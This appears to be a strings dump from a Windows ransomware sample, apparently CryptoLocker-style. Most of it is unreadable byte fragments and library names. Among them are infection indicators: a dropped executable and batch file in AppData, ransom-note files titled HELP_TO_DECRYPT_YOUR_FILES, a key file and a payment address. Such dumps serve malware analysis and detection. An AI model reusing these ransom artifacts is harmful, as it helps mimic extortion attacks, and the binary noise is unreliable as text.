xvC
lvC
`vC
TvC
HvC
8vC
,vC
 vC
|uC
puC
\uC
LuC
@uC
4uC
(uC
rrr
~~~
rrr
bbb/
tbbb!
vvv
sssT
^^^>www
bbbD
bbb.
fff
rrr
aaa:
VVV#
}}}
qqq^
^^^?
}}}
xxxv
eeeQ
~~~
}}}|
iiiU
rrrp
[[\G
jjjW
fff4
]]]4
```
ggg
xxx
ssts
mmmW
WWW/
```
yyy
qqqf
\\\3
^^^
uuu
aaaA
eee
vvv
ddd9
___
^^^
hhh
}}}{
hhhG
ttt
rrr8
iii
oooX
uuu
ggg.
mmm
kkk>
ddd
jjj1
ccc
ggg0
~~~
zzz
eee
mmm0
bbc
uuuM
ddd
hhh/
zzzv
^^^@
vvv
wwwQ
~~~[
}}}X
qqq|
pppK
ZZZ9
}}}W
oop$
jjj9
^^^
ooo
www
rrr
{{{b
|||
~~~
ggg2
lll*
}}}
tttNuuu
vvv
ppp
eee!uuu\
rrrMlll
zzz
ddd
jjj'}}}Y
fff
yyy
yyyUeee
mmm
iiiS
qqqAppp
vvv
bbb$mmmM
xxx
gggG
hhi0
|sC
0.2.6a
|sC
00P`00P
++}V++}
&&jL&&j
66Zl66Z
??A~??A
44\h44\
11Sb11S
##eF##e
''iN''i
,,tX,,t
;;Mv;;M
)){R)){
//q^//q
  `@  `
99Kr99K
33Uf33U
<<Dx<<D
88Hp88H
!!cB!!c
==Gz==G
""fD""f
**~T**~
22Vd22V
::Nt::N
$$lH$$l
77Yn77Y
%%oJ%%o
..r\..r
>>B|>>B
55_j55_
((xP((x
--wZ--w
R~AeS~Ae
j:'^
:'^
8 0
U 0
vm@
&5D
&5D
Z|%
mzC
RYD
Xt!
Xt!
i)I
X>k
:=c
Q3`
EbS
dwB
+NpHhXpHh
(rK
$fU
*fU
(v/
I0(
4.S
4.S
]@`
e^q
@CFg
H2+
lZrNlZr
X6-9'6-9
!h\
[TE$6.:$6.
 ?ZwKiZwK
C<"
&O\r
gDf;
Df;
~4[
C)v
J$}
R5w
H7G
d"G
?uV},
V},
ING
oPx
bT~FbT~F
^.9
Jo6
Jo6
|31
*?#1*?#
f1tN
7tN
_vM
JFeQ
FeQ
<zG
s?U
7<S
+8$4,8$4
%w(<I
(<I
!Hl\tHl\
W}|sC
|sC
.?AVtype_info@@
Y}>
u|sC
Prl
|sC
|sC
.?AVbad_exception@std@@

abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ



abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
PST
PDT
(XD
N@
kU'9
&D(
HMXB
9;5
?q=
?Zd;
?3=
?/L[
S;uD
?$#
;1a
z?aUY
D?$?
*?}
d|F
U>c{
#Tw
zc%C1
.:3q
,%I
-64OS
NKeb
|sC
.?AVout_of_range@std@@
1M658Rwbf7PNwFMLgCRAmu2YedRM6BNKJY
m61V
5|^
F04
iuD}X%
"i$H
I"@a/r
>k~
C:\Users\Dummy\AppData\Roaming\tpoawuj.exe
C:\Users\Dummy\AppData\Roaming\tpoawuj.bat
C:\Users\Dummy\AppData\Roaming
C:\Users\Dummy\AppData\Roaming\help.html
C:\Users\Dummy\AppData\Roaming\log.html
C:\Users\Dummy\Desktop\CryptoLocker.lnk
C:\Users\Dummy\Desktop\HELP_TO_DECRYPT_YOUR_FILES.bmp
C:\Users\Dummy\Desktop\HELP_TO_DECRYPT_YOUR_FILES.txt
C:\Users\Dummy\AppData\Roaming\key.dat
"V;
jDsW
BEb)cA
U~V.
M=+&
CBj
]G){
#|t
Gg5{
HlzKK|
:N<xY
MqI
"=pj
}Mh
GI0
piSV
r&n
p:-
TBf
dM"J
[XF
9;A
tor
*X
S&y
wSD
;Nd
=Jx
Ui]
#6G
hP^
/`H
(`H
)`H
(`H
C:\Users\Dummy\AppData\Roaming\tpoawuj.exe
u0}
uPu
u0n
up/
u`0
u@+
jwC
p;P
jwC
p;P
p;P
p;P
@:P
@:P
p;P
d5s
by6s
\REG
Y\USER\S-1
-21-609387795-
45462786-3858536984-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings
P3P\History
2v2s
M2s
f2s
M2s
cm2s
\REGISTR
\REGISTRY\USER\S-1-5-21-609387795-2945462786-3858536984-1001\Software\Microsoft\Windows\
6rr
ersion\Internet Settings\Zones\3
"0w#
hd5s
90w#
mxj
mTj
curve25519
nistP256
1.2.840.10045.3.1.7
nistP384
1.3.132.0.34
brainpoolP256r1
1.3.36.3.3.2.8.1.1.7
brainpoolP384r1
1.3.36.3.3.2.8.1.1.11
brainpoolP512r1
1.3.36.3.3.2.8.1.1.13
nistP192
1.2.840.10045.3.1.1
nistP224
1.3.132.0.33
nistP521
1.3.132.0.35
secP160k1
1.3.132.0.9
secP160r1
1.3.132.0.8
secP160r2
1.3.132.0.30
secP192k1
1.3.132.0.31
secP192r1
1.2.840.10045.3.1.1
secP224k1
1.3.132.0.32
secP224r1
1.3.132.0.33
secP256k1
1.3.132.0.10
secP256r1
1.2.840.10045.3.1.7
secP384r1
1.3.132.0.34
secP521r1
1.3.132.0.35
m
ml"
m0!
mD!
m,"
m@"
mh!
mx!
H|o
8zo
mTj
mxj
p1s
p1s
p1s
xDn
hys
h"(
p1s
0sp
hR(
p1s
@Vp
p1s
0Rp
p1s
;^4
(Ro
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVbad_function_call@tr1@std@@
.?AVbad_alloc@std@@
.?AVResultException@wil@@
.?AVexception@@
.?AV<lambda_564224130aeea7534e4e70400727c71c>@@
n0z
nPz
Plo
C;u
8<;u@<;u0<;uH<;u8<;u@<;u0<;uH<;u
<;u
<;u
<;u
<;u
<;u
<;u
<;u
<;uP
FuP
Fuh
Fuh
S;u
 Fu
P;u
P;u
P;u
P;u
P;u
!Fu
Q;uPV;u
W;u
(Fu
Q;u
S;u,E;u
Y;u
Y;u
^;u
X;u
^;u
!Fu
`;u
`;u
`;u
`;u
`;u
`;u
`;u
`;u
`;u
`;u
`;u
`;u
`;u
`;u
`;u
`;u
`;u
`;u
ZAu
!Fu
!Fu
$"Fu
"Fu
\"Fu
D"Fu
"Fu
|"Fu
"Fu
"Fu
#Fu
"Fu
<#Fu
$#Fu
t#Fu
\#Fu
#Fu
#Fu
#Fu
#Fu
$Fu
$Fu
T$Fu
<$Fu
$Fu
t$Fu
$Fu
$Fu
!Fu
"Fu
D"Fu
|"Fu
"Fu
"Fu
$#Fu
\#Fu
#Fu
#Fu
$Fu
<$Fu
t$Fu
$Fu
`MFu
`MFu
(Fu
 r;u$r;u(r;u,r;u0r;u4r;u8r;u<r;uDr;uLr;uTr;u`r;ulr;utr;u
r;u
r;u
r;u
r;u
r;u
r;u
r;u
r;u
r;u
r;u
r;u
r;u
r;u
r;u
r;u
r;u
r;u
r;u
r;u
r;u
r;u
r;u
s;u
s;u
s;u
s;u s;u,s;u@s;u
Ls;uTs;u\s;uds;uls;uts;u|s;u
s;u
s;u
s;u
s;u
s;u
s;u
s;u
t;u
t;u
t;u
t;u t;u(t;u0t;u8t;u@t;uHt;uPt;uXt;u`t;upt;u
t;u
t;u t;u
t;u
t;u
t;u
t;u
t;u
t;u
t;u
u;u
u;u u;u4u;u\u;u 7Fu`7Fu
fmod
'Du6
Du6
Du6
Du6
Du6
Du6
Du6
qDu
qDu
qDu
qDu
qDu
qDu
qDu
qDu
qDu
rDu
rDu)rDu.rDuJrDuZrDunrDu~rDu
rDu
rDu
rDu
rDu
rDu
rDu
sDu"sDuBsDuGsDuasDufsDu
sDu
sDu
sDu
sDu
sDu
sDu
tDu
tDu*tDu>tDuVtDujtDu
tDu
tDu
tDu
tDu
tDu
tDu
tDu
uDu.uDu3uDuMuDuRuDuruDu
uDu
uDu
uDu
uDu
uDu
uDu
uDu
vDu*vDuBvDu
atan2
DuX
Du5
Du5
Du5
Du5
DuX
DuX
Du6
sinh
cosh
Du!
tanh
DuA
exp
=u!
=u
=u"
=u#
=u$
=u%
=u&
.?AVexception@@
.?AVbad_cast@@
.?AVbad_typeid@@
.?AV__non_rtti_object@@
.?AVbad_exception@std@@
.?AVDNameNode@@
.?AVcharNode@@
.?AVpcharNode@@
.?AVpDNameNode@@
.?AVDNameStatusNode@@
.?AVtype_info@@
.?AVbad_alloc@std@@
.?AVlength_error@std@@
.?AVlogic_error@std@@
.P6AXPAV__ExceptionPtr@@@Z



abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ

abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
N@
kU'9
&D(
HMXB
9;5
?q=
?Zd;
?3=
?/L[
S;uD
?$#
;1a
z?aUY
D?$?
*?}
d|F
U>c{
#Tw
zc%C1
.:3q
,%I
-64OS
NKeb
PST
PDT
acos
asin
atan
cos
log
log10
?pow
sin
sqrt
tan
@8m
oK[
v@*
okC
Wp%
oP2
o02
o02
o@!
F "
F4"
FD"
F\"
Fx"
F@#
F`#
Fx#
MSAFD Tcpip [TCP/IPv6]
MSAFD Tcpip [TCP/IP]
Tcpip
Tcpip6
NwlnkIpx
NwlnkSpx
AppleTalk
IsoTp
Psched
\Registry\Machine\System\CurrentControlSet\Services\Tcp\Parameters
\Registry\Machine\System\CurrentControlSet\Services\Tcp\VParameters
\Registry\Machine\System\CurrentControlSet\Services\Tcpip\Parameters
 Bu
xDn
w y
@--w
s`5
s`C
sPC
sxC
@go
s0.
 ]o
HTTP/1.1 301 Moved Permanently
Content-Length: 0
Location:
v~O
p8o
`ws
n00
`so
q`F
Xos
n00
|:w
q 1
q`F
q /
qXao
HDs
@;o
t0w
~-w4
0wjMG
8y-w
y-w
Ut-w
t-w
p-w
;q-w
.wP
_G-w
_G-w
:w^~m
_G-w
@.w
L-w
_G-w
0wB
/-wp
~--w
pyo
j.-w
0we$
0wA
0wB
pyo
_G-w
f~m
j.-w
n:w
-wRDG
m:w
,w8n:w
XVr
"m-w
n:w
-wrGG
j.-w
yV.w
8|p
8|p
8|p
 xo
8|p
8/n
-wH
-wH
n~m
w0bo
w]}
sC:\Win
mws\S
@wo
H-w
_G-w
f~m
j.-w
~--w
~--wc
-w>)G
0wB
-wH
-wR+G
-w1
qc/w
PTp
8Tp
<Tp
<Tp
8Tp
~--w4
j.-w
yV.w*
~-wl
"!G
8y-wH
y-w
\-w
*-w
@+-w0
C:\Windows\System32\en-US\wshqos.dll.mui
z"G
0wB
Q)w
`m:w
`m:w
F.w
`jm
"`.w<
^.w
^.w
-w8
^.w
U1w
-wN
C:\Windows\System32\en-US\wshqos.dll.mui
\-wZ&G
XGq
xGq
j.-wF
~--w
~--w
*-w
@+-w
C:\Windows\System32\wshqos.dll
en-US
\-wz
XGq
xGq
j.-wF
C:\Windows\System32\
~--w
~--w
*-w
@+-w
C:\Windows\System32\wshqos.dll
0wB
-w<
-wP
0w
PT
@.w
S.w
PT
`m:w^
`m:w
F.w
-wP
t0w|
~-w
 3.w
8y-wp
y-w
Ut-w
t-w
O)w
,wh
,w&
C:\Windows\SysWOW64
p-w\
;q-w
..w
hKv
j.-wP
 Rv
~--w
hKv
j.-wP
@Vv
~--w<
~--w
@Vv
z}z
v iz
P}z
`{:w
t0w0
1w3
1w3
j.-w
yV.w4
w`@u
u2-w
8Xr
HWr
-w8
-w8
-w
Hiw
Hiw
Hiw
u`iw
`iw
-wB
:wg
,w&
,w@
&87u
@7u
`Rp
.wp
"`Rp
90w
,wP
0Rp
}X/w
0wj
MX/w
8c1w
p;P
p;P
x05s
d5s
x05s
05s
d5s
c5s
42s
4b2s
F1s
cj2s
Y2s
cm2s
\??\C:\Windows\SysWOW64\WININET.dll
4\WININET.dll
\??\C:\Windows\SYSTEM32\WININET.dll
90w#
hd5s
90w#
Nu`
Mu@ONu@
sNu
3Nu
SOu
\Tu`
cQu
MuP
TPuP
Ou`
&Ou
sxs
s|t
srt
sht
s^t
sTt
sJt
sns
sds
sZs
s@t
s6t
s,t
s"t
s?s
s n
vpt
v0I
vp(
v0u
v@L
s`W
s@I
s E
s`R
wpq
w@[
w0P
w p
w k
wPw
w`5
w0;
wP7
sdp
vph
v A
v`q
vpZ
v M
sfh
sVh
sFh
uPr
sql
x}u
@quv
s$l
s,m
s"m
sSl
sIl
s?l
p@_
p X
p`:
p@[
s.\
:r@,@r
p1s
piq
hB)
p1s
 Bu
hdw
hr)
`'x
p1s
yu@
zu,
yuh
yu0[yuc
byu
yu@cyuu
yu86n
<uyu
c.V
ew|>&=4_
^`i
W$N
bVn{
"BS
|u0
|u@
/w@
20w`
|u C
Jyu
(5n
X5n
}us
}uk
}u\
}u(
}ua
}uW
}uM
}u)
}uD
}uu
}uN
}u|
}u"
}u,
}u6
}u@
}uJ
}uT
}u^
}uh
}ur
}ud
}u?
}uI
DBv  Bv
Avp
?v`
@vP$@v
{Av`
Gv@
"Bv
,7v
.?AVbad_alloc@std@@
,7v
.?AVexception@std@@
,7v
.?AVbad_array_new_length@std@@
,7v
.?AVtype_info@@
,7v
.?AVException@@
,7v
.?AVFileFormatException@@
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
OPENGL32
FNOT
)7v
\Jv
\Jv \Jv \Jv(\Jv(\Jv
B8u
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
@a1w
sGu
0`Hu0`Hu8`Hu8`Hu
iHu
TGu
SGux`Hux`Hu
`Hu
`Hu
`Hu
`Hu
w>j/
DiskSpinDownMax
Software\Microsoft\Windows\CurrentVersion\Controls Folder\PowerCfg\PowerPolicies
LastID
Control Panel\PowerCfg\PowerPolicies
DiskSpinDownMin
CurrentPowerPolicy
GlobalPowerPolicy
Software\Microsoft\Windows\CurrentVersion\Controls Folder\PowerCfg
Control Panel\PowerCfg
@.w
t0w4
~-wL
 3.w
8y-w(
y-w
Ut-w
t-w
,w<
O)w<
,w
,w&
C:\Windows\SysWOW64
p-w
;q-ww
/-w
-wH
DHn
d-wDHn
(Hn
5-w(Hn
z:w
,Q/w
,wV
,w*
,wF
@0m
.DLL
+wR~m
_G-w
X~m
H-wpGn
C:\Windows\SYSTEM32\ntdll.dll
.dll
-wpGn
B.w
,w,
hS)w6
*.w
pi-ms-win-core-apiquery-l1-1-0.dll
.dll
0.dll
(Hn
m:w
30wu
Tpm
`{:w
0w:Q.w
IQ.wp
O.w
H.w.
{:w
0wB
U1w
.wz
uf+w
U/w
-wl"0w
{:w
0*/w
up^
,wF
{:w
{:w`{:w
,w`{:w
90w
@pm
}X/w
0wj
MX/w
8c1w
GuA
GuK
.2s
cm2s
0w#
xxw
hd5s
xxw
xxw
xxw
90w#
A!-
vN|j
iue
gHP
AtMC
_)x
Jf-
iP>psho
Xc:o
^+w?
Fqr`38
xg/
qv@S
04+
r{6
JF}
0='sjM
C6|BD
+8K
03H
~w:F
qsQ2
MAx
Xuq
/6/
0Tv
P5Z
L3<
Qo<-C
voO
KVY
?cN-
tOf
KvL
}t;n
2bu
LD?
@aD
}@Q
K+raGJ
#[_
^q-@v
nj+G$
8S<
t]=
l/*
D0Urta@
1'L
NUT
O<?Jdp
*-xa<
^?4
OC}
[ZD
Wl0S
zaY
^r6
JI06y`1
w(L
;P|Ka
XMU
(8D
rBx
e26
'&N
-BS
^&<
:}Kg
C-m
,+Q$JT/Q
9$;K+
}A6
a&6
wwI
PTt
-HZ
)i~
_?Y
w(B
8`b
KZ\5L
-gv
QSP
Uv^J
n!A
6sS
qUd
8"=
.I[
+zP
&L+
e.:
Sw]
@V?
w);
=&7
IIM
_%mY
Mh)
@>U
w@u
<@M
,}U8OR
Z;aF
$Ze
`sV
,3Sp
Q[fS
>w<^6
gk;
XBM
j41
bd^ms
{f$
c l@
6dm
6>-A
lWv&iyo_
x05s
d5s
by6s
\KnownDlls32
d5s
c5s
42s
4b2s
 ow
 ow
cj2s
Y2s
cm2s
\??\C:\Windows\SysWOW64\ncrypt.d..
\KnownDlls32\NTASN1.dllW
$qw
TEp
0w#
hd5s
90w#
RESCHIT
\g*<7
l*<7
~T6
p*<7
\g*<7
p*<7
1<7
1<7
W2H
l*<7
d*<7
\g*<7
1<7
L0z
i*<7
2cv
1<7
W2H
W2H
E97
1<7
\g*<7
FIORa7
1<7
1T+
1<7
^n39
^n39
1<7
:uv997
I=7
^n39
LRa7
s\/
sf/
sp/
sz/
v`J
v D
vpN
v`Q
v N
\yp
*\.ep
v D
vP=
v@1
v`#
v D
vP=
v@1
v`#
07o
cZ4
cZ4
 uo
 Ko
DESKTOP-AERI7HN
p[o
_G-w
j.-w(
8#x
~--w
~--w
v8#x
v 2u
r}z
 2u
t}z
x}z
t}z
~C_
Pdw
j.-w
yV.w&
8Xr
X[q
wX[q
X[q
n:w
Pdw
-w[
X[q
X[q
X[q
X[q
n~m
w0bo
w~D
,w0}t
0}t
u2-w
hKv
j.-wJ
j.-w
x~u
~--w
V[v
X[v
L#0w
0wx~m
 [v
 [v
u2-w
 [v
j.-w8
 [v
V[v
 [v
~--w
(~u
u2-wp
 [v
V[v
j.-w
~--w0
~--w
p(Vq
-wp
0wo
-wr
yV.w
UPdw
syV.w
syV.w
yV.w
wa4
s06
.fi
Pdw
V.w
pez
xez
s`t
yV.w
.wt
.wt
-w2
s4To
s($v
-wD
,wJ
U1w
yV.w
,w<Zs
 |,w
sHYp
|,w
 |,w
|,wf
90w
,wP
(Zs
}X/w
0wj
MX/w
8c1w
v -
v*-
v4-
v>-
vH-
vR-
v\-
vf-
vp-
vz-
vx.
vn.
vd.
vZ.
v2.
v<.
vF.
vP.
v(,
!Mv
!Mv
!Mv
!Mv$"MvP"Mvt"Mv
"Mv
"Mv
"Mv
#Mv,#Mv&N*
h#Mv
h#Mv
}1s
n@&
0bo
hfo
wMv
LvMv
wMv
dwMv
1vMv
u@a
u`U
vMv
vMv
wMv
.wX
s0c
sL6
sL6
s&u
s u
s0u
s.u
s/u
.|$
ICV
s,z
s8z
s$3
sDz
s\z
sPz
sdz
spz
sH_
s<p
s0p
!t!
r#t!
x#t
`C"t
sl7
sH7
s07
spA
/4E
jfq
h~v
IsB
l^"
U(L
U(L
U(L
uEg$<
uEg$<
uEg$<
uEg$<
uEg$<
k\;
jc(=
jc(=
I]@
JQ:
Ru{
M7?
^F{}
ICV
tw]
JQN
Klqt>S
c.V
ew|>&=4_
W$N
bVn{
"BS
^`i
-#("%
'$&!
Lucida Console
Courier New
TTFontDimenCache
TTFontDimenCacheDBCS
_DEFAULT.PIF
\WINDOWS\PIF
DOSIME
ja-JP_radstr
,t`K
20w
`w.w
h:w
h:w
84n
.w`w.w`
}G` T
jz*=
K/^`
sHF
\lerr
C\@h
]W;de
:PY
NHPZ;q
X|*J
;x_
/5e
z4]
5P8
(t3
8Ot
Mn1$Z
D'8
Yjn
mlI
)3i
uI#
t*+
{/R
tE$
b&I
>RQ
#z<Sz
Vp_]H
[Ob
=?=M
CVmP
{Kg
/%Q
6|
ZlS
6\y
dA)|
\*%
p&2/f
P1T
@Bo*
rJx
,/A
`4a
maP
3b~
Oj)Ex
.!g
r)$
z6'
H3u<
gfx
%g\&
zwc
)'#
*1F
TPru
~n`
h:Lbf+
l8.
zgw
"Zd
dIC
\(+
x-S
:Ho`
J[s
)jI
7@3d
#%m
f_K
V`Os
nKP
'z{
lzUyg
Lr\A}
mRP
$|m3
"`<
!K[394
m}2i
 <D
_9|M
5={
eUn
FMC
[QE
hzQ
LU;
aLn2>
xoC
S}G,r
6K;
m$&
MG=
7.6
(I>y
VJ'
T^X
b5g
`pA
KO.7_)i
L{@l
&jd
nnp
UBg
Ay5
;RrEz
7j c
NS;
&U'
)7w
sxs
`K&N
)=PF;
=y<
 iXv
Yv@iXv
XvA
Yv{
_av
TXv
_av
`iXv
v`TYv
jcv$
icv
eXv
eXv
fYv
v\dYvTfYv
v0dYv
fYv
dYv
fYv
cYvdfYv
dYvtfYv
dYv
pfv
dYv
?uv
gvxdYv
uv|eYvDfYv
vTeYvX
pqfv4eYv
}Xv
eYvh
eYv
wXv
iYvP
iYv
fYv
}Xv
eYv
dYv
fYv
iYv
gvxdYv
uv|eYvh
eYv
fYv
<'Xv
|'Xv
rtv
:Xv
&Xv@
HYYv
zdv
zdv
&Xv
ov@
Xv
SYv
xXv
@Pav
kXv
Scv
kXv
kXv
;Xv
}bv
;Xv
btv
`Xv
UYv
fcv
Xv
kXv
`uv
VYv
`Cuv
`Cuv`7Xv
`Cuv
VYv
`CuvXWYv
`Cuv
`Cuv0WYv
`Cuv,VYv
`Cuv
UXv
`Cuvp
Xv
dcvDWYv
WYv
WYv
v@VYv
vdUYv
eXv
svHAXv
rvpeXv
SYv
BXv
VYv
TYv
Yv
vLTYv
v8TYv
TYv
RYv
v4SYv
v<UYv
v$TYv
TYv
UYv
Xv
Xv
VYv
UYv
8<Xv
sv8
rvt*Xv
rv$*Xv
sv4"Xv
sv8*Xv
Xv
rvl
rv$
eXv
rvL
rv`*Xv
&Xv
rv|
TYv
TYv
;Xv
Bgv
Yv
UYv
08cv$)Xv
#uvhVYv
TYv
Stv
VYv
SYv
`ctv
TYv
tv(UYv
UYv
Yv
bcv,
Yv
Xv
SYv
Yv
-tvP
Xv
hv\eXv
ftv
6Xv
)Xv
svPUYv
)Xv
SYv
Yv
-VeDmc*
[fv
XvZ
PYv
XvX
PYv
XvY
PYv
Xv[
PYv,
4rYv
rYv
prYv
|uYv
tYv
tYv
tYv
tYvptYv
uYv
tYvHuYv
tYv
WYv
WYv
{Xv
{Xv
{Xv
{Xv
{Xv
{Xv
LXv
LXv
nXvl
Xvh
-Xv
-Xv
@vXv
nXv
WYvp
VYv
ZXv
VYvD
YvtTYv
UYv
kv`
`uv
`uv
`uv
`uv
Yv(
Yv0
Yv8
Yv@
UXv8
"Zv
#Zv
#Zv
#Zv
#Zvp#Zv|#Zv XXv4
XXvX#Zv,XXvd#Zv
Zv $Zv,$Zv
$Zv
$Zv@
0Yv
WXv
#Zv
#Zv
#Zv
#Zv
$Zv
$Zvh$Zv
Zvt$ZvP$Zv\$ZvL
YvX
Yv8$ZvD$Zv
$Zv
$Zv
$Zv
$Zv
$Zv
$Zv
$Zv
$Zv@%ZvL%Zv(%Zv4%Zv
%Zv
%Zv
$Zv
%Zv
%Zv
%Zv
%Zv
%Zv|%Zv
%ZvX%Zvl%Zv`
Yvl
Yv$&Zvx
Yv0&Zv
&Zv
XXv
&Zv
%Zv
&Zv
%Zv
%Zv
&Zv
&Zvh&Zv
Yvx&Zv
YvT&Zv\&Zv<&ZvH&Zv
&Zv
&Zv
&Zv
&Zv
&Zv
&Zv
&Zv
&ZvL'ZvX'Zv
Zv8'Zv
RYvD'Zv 'Zv,'Zv
'Zv
'Zv
'Zv
'Zv
'Zv
'Zv
'Zv
'Zvh'Zvt'Zv
@ Zv
ZvP!Zv
!Zv
 Zv
!Zv
 Zv
 ZvH Zvt ZvD"ZvX"Zv
"Zv4"Zv
"Zv
"Zv
!Zv
!Zv8#ZvH#Zv
"Zv
#Zv
"Zv
"Zvd"Zv
*Yv86n
NXvxNXvHNXv8NXv
NXv
NXvxNXvHNXv8NXv
NXv
NXv
NXv
NXv
NXvxNXvHNXv8NXv
OXv
NXv
NXv
NXv
NXv
NXvxNXvHNXv8NXvxNXv
NXvHNXv8NXv
NXvxNXv
NXvHNXv8NXv
NXv
OXv
NXv
NXvxNXv
NXvHNXv8NXv
NXv
NXv
OXv
NXv
NXvxNXv
NXvHNXv8NXv
:cv
(/J
SAD
JJn8
`uv
YvT
Xv@
Zv~
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVbad_alloc@std@@
.?AVResultException@wil@@
.?AVexception@@
.?AVCAtlException@ATL@@
`uv
`uv
BXv
[vL
Xv|
Xvl
;Xv
OXv
NXv
NXv
NXv
NXv@
ZYvP
[v0
[v8
}Qrx
/4E
jfq
h~v
IsB
l^"
Software\Microsoft\StorageLibrary\ChangeTracking\%s\%d
c.V
ew|>&=4_
^`i
W$N
bVn{
"BS
mvP
mv
Hcv0
windows.storage.dll
&uv
lv
lv`
20w
,[[v
<[[v
[[v
[[v
Z[v
Z[v
,[[v<[[v
[[v
[[v
Z[v
Z[v
Xv<kXv
XvTkXv
&Tv$
Svp
Sv|
SvX
H2n
P2n
H2n
 3n
(3n
`3n
 3n
P0n
`0n
P0n
uXN
Sc10
lsth
ulstc$d
u$d
u,d
u,d
lstpXd
uXd
u`d
u`d
csX
cs`
cs`
csh
csh
(cs
(cs
uv^
uvq
uv{
uv]
uvS
uvg
uvI
uv?
uv+
uv5
uv!
uvq
uv}
uvs
uvi
uv_
uvD
uv%
uv/
uv9
uvG
uvQ
uvr
uv^
uv#
uv-
uv7
uvA
uvK
uvU
uv_
uvi
uvy
uvo
uve
uv[
uvQ
uv/
uv9
uvC
uvM
uvW
uva
uvk
uvu
uv)
uv3
uv=
uvG
uvz
uvp
uvf
uv\
uvR
uvH
uv>
uv4
uv&
uv0
uv:
uvD
uvN
uvX
uvb
uvl
uvv
uv
uv*
u L}u
{u0-zu@
zup<}u0(}u
|up
zu`
K}u
}u@C}u@N
8}u
q}u
|u@Gzu
JzuPi}upS}u`]}u`
zu g}u
J}u
uv$
uv.
uv8
uvL
uvB
uvu
uvk
uva
uvF
uv~
uvt
uvj
uv`
uvV
uv[
uv.
uvN
v`#
vpZ
v@e
v`q
vp'
v04
vpN
v M
uv\
uv>
uvw
uvs
uPn
u0U
uPr
upm
u`g
uv!
uv+
u`U
u@a
uv!
uvF
uvh
uv2
uv+
uvP
uv<
uvT
uv^
uvZ
@J}u
u`J}u
uv%
uv/
uvj
uvl
uvb
uv0
uv:
uvL
uvB
uv'
uv`
uv|
uvr
uvh
uvT
uvJ
uv/
uvI
uvS
uvq
uvg
uv5
uv?
uvv
uv{
uvA
uvK
uvU
uvU
uv_
uvi
uvK
uvs
uvM
uvg
uv9
uv/
uv%
uv{
uvq
uvg
uv]
uvS
uvI
uv?
uv~
uvt
uvj
uv6
uv(
uv2
uv<
uv}
uvs
uvi
uv%
uv@
uvJ
uvT
uv^
uvh
uvr
uv|
uv~
uvt
uvj
uv`
uvV
uvL
uvB
uv8
uv.
uv$
uvz
uvp
uvf
uv\
uvR
uvH
uv>
uv4
uv*
uv
uvv
uvl
uvb
uvX
uvN
uvD
uv:
uv0
uv&
uvs
uv}
uv[
uv@
uv%
uvg
uvB
uvR
uvH
uv4
uv*
uv
uv>
sw%
sm%
sc%
sY%
s;%
sE%
s %
s%?
s/?
s6L
s&(
s0(
s"L
s~>
st>
sj>
s`>
sV>
sF>
s6>
s&>
sz=
sp=
sf=
s\=
sR=
sH=
s>=
s4=
s*=
s =
s~<
st<
sj<
s`<
sV<
s><
s4<
s*<
s <
st;
sj;
s`;
sV;
sL;
sB;
s8;
s.;
s$;
sz:
sp:
sX:
sN:
sD:
s::
s0:
s :
sv9
sf9
sV9
sF9
s>M
s4M
sHM
s69
s*M
s&9
sv8
sl8
sb8
sX8
sN8
sD8
s:8
s08
s&8
s|7
sr7
sh7
s^7
sT7
sJ7
s@7
s67
s&7
sh6
s^6
sT6
sJ6
s@6
s66
s,6
s"6
sx5
sn5
sd5
sZ5
sP5
sF5
s<5
s25
s(5
s~4
st4
sj4
s`4
sV4
sF4
s64
sv3
sf3
sV3
sF3
s63
s&3
sv2
sb2
sX2
sN2
sD2
s:2
s02
s&2
sv1
sX1
sN1
sD1
s:1
s01
s 1
s|0
sr0
sh0
s^0
sT0
sJ0
s@0
s.0
s$0
sv/
sf/
sV/
sF/
s6/
sv.
sf.
sV.
sF.
s6.
s&.
sv-
sf-
sRM
sV-
sF-
s6-
s&-
s M
sv,
sf,
sV,
sF,
s6,
s&,
sx+
sn+
sd+
sZ+
sP+
sF+
s<+
s2+
s\M
s(+
si*
s_*
s:*
sxA
snA
sdA
sZA
sPA
s<A
s2A
s(A
sFA
s8@
sB@
sL@
s"B
s,B
sV@
s`@
s6B
sj@
s@B
sJB
st@
sTB
s^B
s~@
shB
srB
s|B
s&C
s0C
s:C
sDC
sNC
sXC
sbC
slC
svC
s D
s*D
s4D
s>D
sHD
sRD
s\D
sfD
spD
szD
s^?
sh?
sr?
s|?
sT?
s0*
soL
syL
sb#
sX#
sN#
sD#
s:#
s0#
s1
sL
sV
s&#
s`
sj
st
s~
s(!
s2!
s<!
sF!
sP!
sZ!
sd!
sn!
sx!
s""
s,"
s6"
s@"
sJ"
sT"
s^"
sh"
sr"
s|"
s$)
s.)
s8)
sB)
sL)
sV)
s`)
sj)
st)
s~)
sp(
sU(
sz(
s6H
s,H
sJH
sj'
s;'
sV'
s(&
sW&
sC&
s[L
seL
s'
s1J
s'J
s)$
s3$
sG$
s=$
sQ$
s[$
sy$
so$
se$
s`J
s;J
swK
scK
sHK
s4K
s>K
szG
spG
sfG
s\G
sRG
sHG
s>G
s4G
s*G
s G
svF
slF
sbF
sXF
sNF
sDF
s:F
s0F
s&F
s|E
srE
shE
s^E
sTE
sJE
s@E
s6E
s,E
sa&
s''
! #!%"'#)$+%-&/'1(3)5*7+9,;-=.?/A0E1I2M3Q4U5Y6]7a8e9i:m;q<u=y>}?
 fl
Hfl
pfl
